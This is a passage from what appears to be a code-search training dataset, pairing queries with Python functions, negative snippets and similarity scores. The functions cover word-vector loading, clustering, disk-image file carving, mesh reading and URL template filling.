(Optional[str], dict):\n print(f\"Started loading vectors from {path} @ {datetime.now()}\")\n words = dict()\n try:\n with open(file=path, mode=\"r\", encoding=\"utf-8\") as source_file:\n # Get the first line. Check if there's only 2 space-separated strings (hints a dimension)\n dimensions = str(next(source_file))\n if len(dimensions.split(\" \")) == 2:\n # We have a dimensions line. 
Keep it in the variable, continue with the next lines\n pass\n else:\n # We do not have a dimensions line\n line = dimensions.split(' ', 1)\n key = line[0]\n words[key] = np.fromstring(line[1], dtype=\"float32\", sep=' ')\n dimensions = None\n for line in source_file:\n line = line.split(' ', 1)\n key = line[0]\n words[key] = np.fromstring(line[1], dtype=\"float32\", sep=' ')\n except OSError:\n print(\"Unable to read word vectors, aborting.\")\n return {}\n print(f\"Finished loading a total of {len(words)} vectors @ {datetime.now()}\")\n return dimensions, normalise(words)", "def extract_feature_vectors_with_keywords(file, dict, keys):\n f = open(file, 'r')\n num_lines = 0\n\n for line in f:\n if(line.strip()):\n num_lines = num_lines + 1\n\n f.close()\n\n feature_matrix = np.zeros([num_lines, len(dict)])\n\n f = open(file, 'r')\n pos = 0\n\n for line in f:\n if(line.strip()):\n flist = extract_words(line)\n for word in flist:\n if(word in dict):\n if word in keys:\n feature_matrix[pos, dict.index(word)] = 2\n else:\n feature_matrix[pos, dict.index(word)] = 1\n pos = pos + 1\n\n f.close()\n\n return feature_matrix", "def print_vectors(self):\n print(\"Vectors:\")\n for name, vector in self.get_vectors():\n self.print_vector(name, vector.items)", "def exportFlatClusterData(filename, new_row_header,new_column_header,xt,ind1,ind2):\n\n filename = string.replace(filename,'.pdf','.txt')\n export_text = open(filename,'w')\n column_header = string.join(['UID','row_clusters-flat']+new_column_header,'\\t')+'\\n' ### format column-names for export\n export_text.write(column_header)\n column_clusters = string.join(['column_clusters-flat','-']+ map(str, ind2),'\\t')+'\\n' ### format column-flat-clusters for export\n export_text.write(column_clusters)\n\n ### The clusters, dendrogram and flat clusters are drawn bottom-up, so we need to reverse the order to match\n new_row_header = new_row_header[::-1]\n xt = xt[::-1]\n\n ### Export each row in the clustered data matrix xt\n i=0\n for row in xt:\n export_text.write(string.join([new_row_header[i],str(ind1[i])]+map(str, row),'\\t')+'\\n')\n i+=1\n export_text.close()\n\n ### Transpose text file for easier reading!\n oldfile_h = open(filename, 'rb')\n\n elements = [ line.split() for line in oldfile_h ]\n oldfile_h.close()\n\n biglist = []\n for splitline in elements:\n #print len(splitline)\n #print splitline\n biglist.append(splitline)\n newarray = numpy.array(biglist)\n #print numpy.shape(newarray)\n t_array = newarray.transpose()\n #print numpy.shape(t_array)\n #print newarray[:,0]\n\n newfile_h = open(filename[:-4] + \"_transposed.txt\" , 'w')\n for row in t_array:\n #print \"The row is currently: %r\" % row\n newfile_h.write(\"\\t\".join(row) + \"\\n\")\n newfile_h.close()\n\n\n ### Export as CDT file\n filename = string.replace(filename,'.txt','.cdt')\n export_cdt = open(filename,'w')\n column_header = string.join(['UNIQID','NAME','GWEIGHT']+new_column_header,'\\t')+'\\n' ### format column-names for export\n export_cdt.write(column_header)\n eweight = string.join(['EWEIGHT','','']+ ['1']*len(new_column_header),'\\t')+'\\n' ### format column-flat-clusters for export\n export_cdt.write(eweight)\n\n ### Export each row in the clustered data matrix xt\n i=0\n for row in xt:\n export_cdt.write(string.join([new_row_header[i]]*2+['1']+map(str, row),'\\t')+'\\n')\n i+=1\n export_cdt.close()", "def load_vecs():\n global VECTORIZER\n global CECTORIZER\n\n v_file = os.path.join(TMP_DIR, 'vectorizer.pickle')\n d_file = os.path.join(TMP_DIR, 
'dectorizer.pickle')\n f_file = os.path.join(TMP_DIR, 'freq.pickle')\n\n if os.path.isfile(v_file) and os.path.isfile(d_file):\n with open(v_file, 'rb') as f:\n VECTORIZER = pickle.load(f)\n with open(d_file, 'rb') as f:\n CECTORIZER = pickle.load(f)\n return True\n\n return False", "def load_bin_vec(fname, vocab):\n word_vecs = {}\n with open(fname, \"rb\") as f:\n header = f.readline()\n vocab_size, layer1_size = map(int, header.split())\n binary_len = np.dtype('float32').itemsize * layer1_size\n for line in xrange(vocab_size):\n word = []\n while True:\n ch = f.read(1)\n if ch == ' ':\n word = ''.join(word)\n break\n if ch != '\\n':\n word.append(ch) \n if word in vocab:\n word_vecs[word] = np.fromstring(f.read(binary_len), dtype='float32') \n else:\n f.read(binary_len)\n return word_vecs", "def _compute_util_data(self):\n\n print(\"Computing PCA of document vectors.\")\n self.pca = PCA(n_components = 3)\n\n print(\"Computing document clusters in PCA basis.\")\n inferred_vecs = np.array([self.model.infer_vector(doc.words) for doc in self.tagged_docs])\n self.pca_reduced_vecs = self.pca.fit_transform(inferred_vecs)\n n_clusters = 25 # TODO find way to determine approx cluster size\n self.kmeans = KMeans(init = 'k-means++', n_clusters = n_clusters, random_state = 0)\n self.kmeans_preds = self.kmeans.fit_predict(self.pca_reduced_vecs)", "def load_data(path=\"data/cora/\", dataset=\"cora\"):\n print('Loading {} dataset...'.format(dataset))\n\n idx_features_labels = np.genfromtxt(\"{}{}.content\".format(path, dataset), dtype=np.dtype(str))\n features = sp.csr_matrix(idx_features_labels[:, 1:-1], dtype=np.float32)\n labels = encode_onehot(idx_features_labels[:, -1])\n\n # build graph\n idx = np.array(idx_features_labels[:, 0], dtype=np.int32)\n idx_map = {j: i for i, j in enumerate(idx)}\n edges_unordered = np.genfromtxt(\"{}{}.cites\".format(path, dataset), dtype=np.int32)\n edges = np.array(list(map(idx_map.get, edges_unordered.flatten())),\n dtype=np.int32).reshape(edges_unordered.shape)\n adj = sp.coo_matrix((np.ones(edges.shape[0]), (edges[:, 0], edges[:, 1])),\n shape=(labels.shape[0], labels.shape[0]), dtype=np.float32)\n\n # build symmetric adjacency matrix\n adj = adj + adj.T.multiply(adj.T > adj) - adj.multiply(adj.T > adj)\n\n print('Dataset has {} nodes, {} edges, {} features.'.format(adj.shape[0], edges.shape[0], features.shape[1]))\n\n return features.todense(), adj, labels", "def eval_cluster_contingency(clustering_alg: List, labels_true, sdist):\n for (alg_name, alg_dict) in clustering_alg:\n if \"alg\" in alg_dict:\n clustering = alg_dict[\"alg\"].fit(sdist)\n labels_pred = clustering.labels_\n alg_dict[\"labels\"] = labels_pred\n else:\n labels_pred = alg_dict[\"labels\"]\n\n pred_label_dict, new_labels = normalize_labels(labels_pred)\n\n alg_dict[\"cm\"] = contingency_matrix(labels_true, new_labels)", "def discover_sectors(path_to_file_under_examination,option):\n\n # Variables #\n\n start_carve_sector, end_carve_sector = [],[]\n current__cluster,_current__cluster = 0,0\n\n # Pointing to file and of file cluster total\n # number calculation\n # Different methods for raw image file\n # or for mounted drive\n\n file = open(path_to_file_under_examination, 'rb')\n\n _clusters_total = int(os.path.getsize(path_to_file_under_examination)/_cluster)\n file.seek(cluster_offset * sector)\n print('Clusters to analyse total:',str(_clusters_total),'...')\n\n # Scanning for headers and footers #\n\n while current__cluster <= _clusters_total:\n\n # This is reading one cluster and then 
moving\n # the pointer one further cluster\n # This approach will not find\n # NTFS resident files\n # And this will not find ZIP files,\n # which are smaller than a cluster\n # Embedded signature and time-sresponses\n # containing files are appr 13 Kb\n # So they can't really be residents\n # This approach will not find\n # non-contiguously clustered files\n\n try:\n current_cluster = file.read(_cluster)\n except Exception as e:\n return start_carve_sector, end_carve_sector\n\n current__cluster += 1\n\n # This will apply the header #\n\n #header_lenght is the lenghts required for signature to work\n beginning_string_to_analyze = current_cluster[0:header_lenght]\n result = re.search(header_hex_code,beginning_string_to_analyze)\n\n # Action if header is present #\n\n if result:\n if result.group(0):\n \n start_carve_sector.append(int(cluster_offset) # Will\n # remember where file starts\n + clusters_per_sectors * (current__cluster - 1))\n\n _current__cluster = 1\n\n while _current__cluster <= maximum_filesize: # Here is\n # administratively set max lenght\n\n # This will read next cluster and move further one cluster #\n\n current_cluster = file.read(_cluster)\n\n _current__cluster += 1\n current__cluster += 1\n\n # This will apply the footer, first to the whole cluster\n # And second to the tail of the next cluster together with the\n # current cluster\n\n result2 = re.search(footer_hex_code,current_cluster)\n if result2:\n if result2.group(0):\n if option == 'algorithm': # 'Algorithmic' read of flag for tail lenght\n if result2.span()[1] + result2.group(0)[21] + result2.group(0)[20] >= len(current_cluster):\n end_carve_sector.append(int(cluster_offset)\\\n + 1 + (clusters_per_sectors)* (current__cluster))\n # result2.group(0)[21] + result2.group(0)[20] are\n # the value of the trailer lenght\n else:\n end_carve_sector.append(int(cluster_offset)\\\n + (clusters_per_sectors)* (current__cluster))\n else:\n if result2.span()[1] == len(current_cluster):\n end_carve_sector.append(int(cluster_offset)\\\n + 1 + (clusters_per_sectors)* (current__cluster))\n else:\n end_carve_sector.append(int(cluster_offset)\\\n + (clusters_per_sectors)* (current__cluster))\n\n cluster_tail_2 = file.read(_cluster)[0:sector] #This\n # is additional cluster-read, not the same read\n joined_tail_2 = current_cluster + cluster_tail_2\n result4 = re.search(footer_hex_code,joined_tail_2)\n if result4:\n if result4.group(0):\n if result2 is None:\n if option == 'algorithm': # 'Algorithmic' read of flag for tail lenght\n if result4.span()[1] + result4.group(0)[21] + result4.group(0)[20] >= len(joined_tail_2):\n end_carve_sector.append(int(cluster_offset)\\\n + 2 + (clusters_per_sectors) * (current__cluster))\n # result4.group(0)[21] + result4.group(0)[20] are\n # the value of the trailer lenght\n else:\n end_carve_sector.append(int(cluster_offset)\\\n + 1 + (clusters_per_sectors) * (current__cluster))\n else:\n if result4.span()[1] == len(joined_tail_2):\n end_carve_sector.append(int(cluster_offset)\\\n + 2 + (clusters_per_sectors) * (current__cluster))\n else:\n end_carve_sector.append(int(cluster_offset)\\\n + 1 + (clusters_per_sectors) * (current__cluster))\n\n file.seek(cluster_offset*sector\n + current__cluster*_cluster)\n\n if result2 or result4:\n break\n destination = path_to_file_under_examination.split('\\\\')[-1]\n print('Scan complete at cluster: ' +str(current__cluster - 1)\\\n + ' ' + str(len(start_carve_sector)) +','\n + str(len(end_carve_sector)) + ' start and end sectors found in '\\\n + destination)\n 
file.close()\n\n return start_carve_sector,end_carve_sector", "def cfdReadFacesFile(self): \r\n\r\n with open(self.facesFile,\"r\") as fpid:\r\n print('Reading faces file ...')\r\n self.faceNodes=[]\r\n \r\n for linecount, tline in enumerate(fpid):\r\n \r\n if not io.cfdSkipEmptyLines(tline):\r\n continue\r\n \r\n if not io.cfdSkipMacroComments(tline):\r\n continue\r\n \r\n if \"FoamFile\" in tline:\r\n dictionary=io.cfdReadCfdDictionary(fpid)\r\n continue\r\n \r\n if len(tline.split()) ==1:\r\n if \"(\" in tline:\r\n continue\r\n if \")\" in tline:\r\n continue\r\n else:\r\n \r\n self.numberOfFaces = int(tline.split()[0])\r\n continue\r\n \r\n tline=tline.replace(\"(\",\" \")\r\n tline=tline.replace(\")\",\"\")\r\n faceNodesi=[]\r\n for count, node in enumerate(tline.split()):\r\n if count == 0:\r\n continue\r\n #faceNodesi.append(int(node))\r\n else:\r\n faceNodesi.append(float(node))\r\n \r\n self.faceNodes.append(faceNodesi)\r\n \r\n ## (array) with the nodes for each face\r\n self.faceNodes=np.asarray(self.faceNodes)\r\n print(self.faceNodes)", "def evaulate_clusters(self, pred_dict, model_dir):\n\t\tclustering_dict = {\"Topic\":[], \"Text\":[], \"Keywords\": []}\n\t\tfor cluster_num, sents_list in pred_dict.items():\n\t\t\tprint(\"\\n cluster number : \", cluster_num)\n\t\t\tprint(\"\\n number of sents : \", len(sents_list))\n\t\t\ttfidf_vec = TfidfVectorizer(use_idf=True, sublinear_tf=True, max_df=0.8, max_features=20, ngram_range=(1,5), min_df=1)\n\t\t\tX_tfidf = tfidf_vec.fit_transform(sents_list).toarray()\n\t\t\ttotal_tfidf = tfidf_vec.get_feature_names()\n\t\t\tfor sent in sents_list:\n\t\t\t\tclustering_dict[\"Topic\"].append(cluster_num)\n\t\t\t\tclustering_dict[\"Text\"].append(sent)\n\t\t\t\tclustering_dict[\"Keywords\"].append(\",\".join(total_tfidf))\n\t\t\"\"\" save the clusters to csv file \"\"\"\n\t\tdf_dominant_topic = defaultdict(list) \n\t\tdf_dominant_topic[\"Topic\"] = clustering_dict[\"Topic\"]\n\t\tdf_dominant_topic[\"Text\"] = clustering_dict[\"Text\"]\n\t\tdf_dominant_topic[\"Keywords\"] = clustering_dict[\"Keywords\"]\n\t\tdf_dominant_topic = pd.DataFrame(df_dominant_topic)\n\t\tdf_dominant_topic.to_csv(os.path.join(model_dir, \"cluster_sentence_topic_mapping.csv\"))\n\t\treturn df_dominant_topic", "def svm_read_problem(data_file_name):\n\t# From libSVM (http://www.csie.ntu.edu.tw/~cjlin/libsvm/), amended\n\t# to allow for comments at the end of instances (preceded by #) and\n\t# to allow for multi-label instances (labels separated by ',').\n\tprob_y = []\n\tprob_x = []\n\tcomments = []\n\tfor line in open(data_file_name):\n\t\tline = line.split(None, 1)\n\t\t# In case an instance with all zero features\n\t\tif len(line) == 1: line += ['']\n\t\tlabels, features = line\n\t\ttmp = features.split('#')\n\t\tif len(tmp) == 2:\n\t\t\tfeatures = tmp[0].strip()\n\t\t\tcomment = tmp[1].strip()\n\t\telse:\n\t\t\tcomment = None\n\t\txi = {}\n\t\tfor e in features.split():\n\t\t\tind, val = e.split(\":\")\n\t\t\txi[int(ind)] = float(val)\n\t\tprob_y += [(map(float, labels.split(',')))]\n\t\tprob_x += [xi]\n\t\tcomments += [comment]\n\n\treturn (prob_y, prob_x), comments", "def load(self, filename):\n\t\tself.V = np.loadtxt(filename)\n\t\tself.D = self.V.shape[0]-1\n\t\tself.K = self.V.shape[1]\n\t\treturn self", "def cluster_faces_in_video(self):\r\n\r\n logger.debug('Executing people clustering')\r\n\r\n rec_loaded = False\r\n\r\n # Try to load YAML files\r\n if os.path.exists(self.cluster_files_path):\r\n\r\n print 'Loading YAML files with clustering results'\r\n 
logger.debug('Loading YAML files with clustering results')\r\n\r\n self.recognized_faces = []\r\n for yaml_file in os.listdir(self.cluster_files_path):\r\n yaml_file_path = os.path.join(\r\n self.cluster_files_path, yaml_file)\r\n with open(yaml_file_path) as f:\r\n self.recognized_faces.append(yaml.load(f))\r\n\r\n print 'YAML files with clustering results loaded'\r\n logger.debug('YAML files with clustering results loaded')\r\n\r\n if not rec_loaded:\r\n\r\n if len(self.tracked_faces) == 0:\r\n\r\n # Try to load YAML file\r\n if os.path.exists(self.track_file_path):\r\n\r\n print 'Loading YAML file with tracking results'\r\n logger.debug('Loading YAML file with tracking results')\r\n\r\n with open(self.track_file_path) as f:\r\n\r\n self.tracked_faces = yaml.load(f)\r\n\r\n print 'YAML file with tracking results loaded'\r\n logger.debug('YAML file with tracking results loaded')\r\n\r\n else:\r\n\r\n print 'Warning! No tracking results found!'\r\n logger.warning('No tracking results found!')\r\n return\r\n\r\n # Make copy of tracked faces\r\n tracking_list = list(self.tracked_faces)\r\n\r\n if ((self.params is not None) and\r\n (ce.FACE_MODELS_DIR_PATH_KEY in self.params)):\r\n if ce.NOSE_POS_FILE_PATH_KEY in self.params:\r\n nose_pos_file_path = self.params[ce.NOSE_POS_FILE_PATH_KEY]\r\n\r\n with open(nose_pos_file_path) as f:\r\n self.nose_pos_list = pk.load(f)\r\n else:\r\n # Save face models\r\n self.save_face_models(tracking_list)\r\n\r\n use_clothing_rec = c.USE_CLOTHING_RECOGNITION\r\n\r\n if ((self.params is not None) and\r\n (c.USE_CLOTHING_RECOGNITION_KEY in self.params)):\r\n use_clothing_rec = self.params[c.USE_CLOTHING_RECOGNITION_KEY]\r\n\r\n if (use_clothing_rec and\r\n ((self.params is None)\r\n or (ce.CLOTH_MODELS_DIR_PATH_KEY not in self.params))):\r\n # Save cloth models\r\n self.save_cloth_models(tracking_list)\r\n\r\n print '\\n\\n### People clustering ###\\n'\r\n logger.debug('\\n\\n### People clustering ###\\n')\r\n\r\n # Save processing time\r\n start_time = cv2.getTickCount()\r\n\r\n self.recognized_faces = []\r\n\r\n # List of segments already analyzed and annotated\r\n ann_segments = []\r\n\r\n model = None\r\n\r\n # Iterate through tracked faces\r\n person_counter = 0\r\n segment_counter = 0\r\n tracked_faces_nr = float(len(tracking_list))\r\n\r\n for tracking_segment_dict in tracking_list:\r\n\r\n self.progress = 100 * (segment_counter / tracked_faces_nr)\r\n\r\n print('progress: ' + str(self.progress) + ' % \\r'),\r\n\r\n if segment_counter not in ann_segments:\r\n\r\n # Save all segments relative\r\n # to one person in person_dict\r\n person_dict = {c.PERSON_COUNTER_KEY: person_counter,\r\n c.ASSIGNED_LABEL_KEY: c.UNDEFINED_LABEL,\r\n c.ASSIGNED_TAG_KEY: c.UNDEFINED_TAG}\r\n\r\n segment_list = []\r\n\r\n segment_dict = {}\r\n\r\n segment_frame_list = tracking_segment_dict[c.FRAMES_KEY]\r\n\r\n segment_dict[c.FRAMES_KEY] = segment_frame_list\r\n\r\n segment_dict[c.ASSIGNED_TAG_KEY] = c.UNDEFINED_TAG\r\n\r\n segment_dict[c.CONFIDENCE_KEY] = 0\r\n\r\n segment_dict[c.SEGMENT_COUNTER_KEY] = segment_counter\r\n\r\n # Start of segment in milliseconds\r\n # of elapsed time in video\r\n\r\n start = tracking_segment_dict[c.SEGMENT_START_KEY]\r\n\r\n segment_dict[c.SEGMENT_START_KEY] = start\r\n\r\n # Duration of segment in milliseconds\r\n\r\n duration = tracking_segment_dict[c.SEGMENT_DURATION_KEY]\r\n\r\n segment_dict[c.SEGMENT_DURATION_KEY] = duration\r\n\r\n if c.ANN_TAG_KEY in tracking_segment_dict:\r\n segment_ann = tracking_segment_dict[c.ANN_TAG_KEY]\r\n 
segment_dict[c.ANN_TAG_KEY] = segment_ann\r\n\r\n segment_list.append(segment_dict)\r\n\r\n ann_segments.append(segment_counter)\r\n\r\n db_path = os.path.join(\r\n self.face_models_path, str(segment_counter))\r\n\r\n if os.path.isfile(db_path):\r\n\r\n model = cv2.createLBPHFaceRecognizer()\r\n\r\n model.load(db_path)\r\n\r\n if model:\r\n # Use model of this segment\r\n # to recognize faces of remaining segments\r\n\r\n ann_segments = self.search_face(ann_segments,\r\n segment_list, model,\r\n segment_counter)\r\n\r\n # Add segments to person dictionary\r\n\r\n person_dict[c.SEGMENTS_KEY] = segment_list\r\n\r\n # Save total duration of video in milliseconds\r\n\r\n tot_duration = (\r\n self.video_frames * 1000.0 / self.fps)\r\n\r\n person_dict[c.VIDEO_DURATION_KEY] = tot_duration\r\n\r\n self.recognized_faces.append(person_dict)\r\n\r\n person_counter += 1\r\n\r\n segment_counter += 1\r\n\r\n del model\r\n\r\n if not (os.path.exists(self.cluster_path)):\r\n # Create directory for people clustering\r\n os.makedirs(self.cluster_path)\r\n\r\n # Save clustering result in YAML files\r\n\r\n # Remove previous files\r\n if os.path.exists(self.cluster_files_path):\r\n shutil.rmtree(self.cluster_files_path)\r\n # Create directory for people clustering results\r\n os.makedirs(self.cluster_files_path)\r\n\r\n counter = 0\r\n for person_dict in self.recognized_faces:\r\n yaml_file_name = str(counter) + '.YAML'\r\n yaml_file_path = os.path.join(self.cluster_files_path, yaml_file_name)\r\n utils.save_YAML_file(yaml_file_path, person_dict)\r\n counter += 1\r\n\r\n # Save processing time\r\n time_in_clocks = cv2.getTickCount() - start_time\r\n time_in_seconds = time_in_clocks / cv2.getTickFrequency()\r\n\r\n print 'Time for people clustering:', time_in_seconds, 's\\n'\r\n logger.debug('Time for people clustering:', time_in_seconds, 's\\n')\r\n\r\n self.anal_times[c.PEOPLE_CLUSTERING_TIME_KEY] = time_in_seconds\r\n\r\n utils.save_YAML_file(self.analysis_file_path, self.anal_times)\r\n\r\n self.calculate_medoids()" ]
[ "0.5931401", "0.58759993", "0.5818201", "0.5670178", "0.55925786", "0.5564548", "0.5553166", "0.5509292", "0.5509292", "0.5505033", "0.55044186", "0.5498727", "0.5490172", "0.54632276", "0.54203254", "0.54109955", "0.5390733", "0.5373782", "0.5334791", "0.5330502", "0.5268046", "0.5259798", "0.5255289", "0.52416337", "0.52404994", "0.5204905", "0.51949906", "0.519409", "0.5173208", "0.51686245", "0.51533806", "0.5151495", "0.5149693", "0.51421916", "0.5121889", "0.51145023", "0.5101953", "0.5099919", "0.50918823", "0.50875026", "0.5069019", "0.5064608", "0.5057623", "0.50465673", "0.5044908", "0.5042355", "0.5040774", "0.5017224", "0.50071317", "0.49974772", "0.49943087", "0.49847558", "0.4969349", "0.4964818", "0.49591225", "0.49581432", "0.49526477", "0.49440587", "0.49440587", "0.49427685", "0.49403533", "0.493936", "0.49375495", "0.49375495", "0.49310416", "0.4925393", "0.49253583", "0.49225336", "0.49209532", "0.4920655", "0.49084288", "0.49014607", "0.49009246", "0.49004397", "0.48965067", "0.4896159", "0.4894978", "0.4893596", "0.4891116", "0.48888114", "0.48855582", "0.48813677", "0.48755386", "0.4869454", "0.48649126", "0.48579943", "0.48573446", "0.4855975", "0.48515326", "0.48514065", "0.4850051", "0.4849994", "0.484957", "0.48474947", "0.48471946", "0.4842504", "0.48405856", "0.4836688", "0.48299828", "0.482863" ]
0.65529263
0
Make custom attributes and methods native
def native_methods(self):
    base_attributes = {
        *dir(TapiAdapter),
        *dir(TapiClientExecutor),
        *dir(JSONAdapterMixin),
        "serializer",
    }
    a = [
        attr
        for attr in dir(self)
        if not attr.startswith("_") and attr not in base_attributes
    ]
    return a
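A minimal, self-contained sketch of the same attribute-filtering pattern shown above; the BaseAdapter, JSONMixin and WeatherAdapter classes are hypothetical stand-ins, not the real tapioca base classes.

class BaseAdapter:
    def request(self):
        pass


class JSONMixin:
    def to_json(self):
        pass


class WeatherAdapter(BaseAdapter, JSONMixin):
    api_root = "https://api.example.com"  # hypothetical extra attribute

    def forecast(self):
        pass


def custom_attributes(obj, bases=(BaseAdapter, JSONMixin)):
    # Collect every public name exposed by the base classes ...
    base_attributes = set()
    for base in bases:
        base_attributes.update(dir(base))
    # ... and keep only the public names the object adds on top of them.
    return [
        attr for attr in dir(obj)
        if not attr.startswith("_") and attr not in base_attributes
    ]


print(custom_attributes(WeatherAdapter()))  # ['api_root', 'forecast']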
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def attributes(self):\n raise NotImplementedError", "def __attrs_post_init__(self):", "def _set_attributes(self):", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature 
unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def attributes(self):\n ...", "def attributes(self):", "def __setattr__(self, attr, value):", "def attr(*args, **kwargs):\n return Attr(*args, **kwargs)", "def __setattr__(*args, **kwargs):\n \n pass", "def __setattr__(*args, **kwargs):\n \n pass", "def __setattr__(self, name, value): # real signature unknown; restored from __doc__\n pass", "def __setattr__(self, name, value): # real signature unknown; restored from __doc__\n pass", "def __setattr__(self, *args, **kwargs):\n ...", "def __setattr__(self, *args, **kwargs):\n ...", "def __setattr__(self, *args, **kwargs):\n ...", "def __setattr__(self, *args, **kwargs):\n ...", "def __setattr__(self, *args, **kwargs):\n ...", "def __setattr__(self, *args, **kwargs):\n ...", "def __setattr__(self, *args, **kwargs):\n ...", "def __setattr__(self, *args, **kwargs):\n ...", "def __setattr__(self, *args, **kwargs):\n ...", "def __setattr__(self, *args, **kwargs):\n ...", "def __setattr__(self, *args, **kwargs):\n ...", "def __setattr__(self, *args, **kwargs):\n ...", "def __setattr__(self, *args, **kwargs):\n ...", "def __setattr__(self, *args, **kwargs):\n ...", "def __setattr__(self, *args, **kwargs):\n ...", "def __setattr__(self, *args, **kwargs):\n ...", "def __setattr__(self, *args, **kwargs):\n ...", "def __setattr__(self, *args, **kwargs):\n ...", "def __setattr__(self, *args, **kwargs):\n ...", "def __setattr__(self, *args, **kwargs):\n ...", "def __setattr__(self, *args, **kwargs):\n ...", "def __setattr__(self, *args, **kwargs):\n ...", "def __setattr__(self, *args, **kwargs):\n ...", "def __setattr__(self, *args, **kwargs):\n ...", "def __setattr__(self, *args, **kwargs):\n ...", "def __setattr__(self, *args, **kwargs):\n ...", "def __setattr__(self, *args, **kwargs):\n ...", "def __setattr__(self, *args, **kwargs):\n ...", "def __setattr__(self, *args, **kwargs):\n ...", "def __setattr__(self, *args, **kwargs):\n ..." ]
[ "0.6156814", "0.60756165", "0.5929101", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5865326", "0.5845628", "0.57064074", "0.5687932", "0.5607915", "0.5607915", "0.55993164", "0.55993164", "0.55395085", "0.55395085", "0.55395085", "0.55395085", "0.55395085", "0.55395085", "0.55395085", "0.55395085", "0.55395085", "0.55395085", "0.55395085", "0.55395085", "0.55395085", "0.55395085", "0.55395085", "0.55395085", "0.55395085", "0.55395085", "0.55395085", "0.55395085", "0.55395085", "0.55395085", "0.55395085", "0.55395085", "0.55395085", "0.55395085", "0.55395085", "0.55395085", "0.55395085", "0.55395085" ]
0.0
-1
Create a URL request
def fill_resource_template_url(self, template, params, resource):
    try:
        return template.format(**params)
    except KeyError:
        all_keys = re.findall(r"{(.[^\}]*)", template)
        range_not_set_keys = set(all_keys) - set(params.keys())
        not_set_keys = "', '".join(range_not_set_keys)
        raise TypeError(
            "{}() missing {} required url params: '{}'".format(
                resource, len(range_not_set_keys), not_set_keys
            )
        )
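A self-contained sketch of the same URL-template technique: fill "{placeholder}" slots with str.format and report any placeholders missing from the supplied params. The simpler placeholder regex and the example URL are assumptions for illustration, not the original values.

import re


def fill_url_template(template, params, resource="resource"):
    # Fill "{placeholder}" slots in the template; if any are missing from
    # params, raise a TypeError naming the missing url params.
    try:
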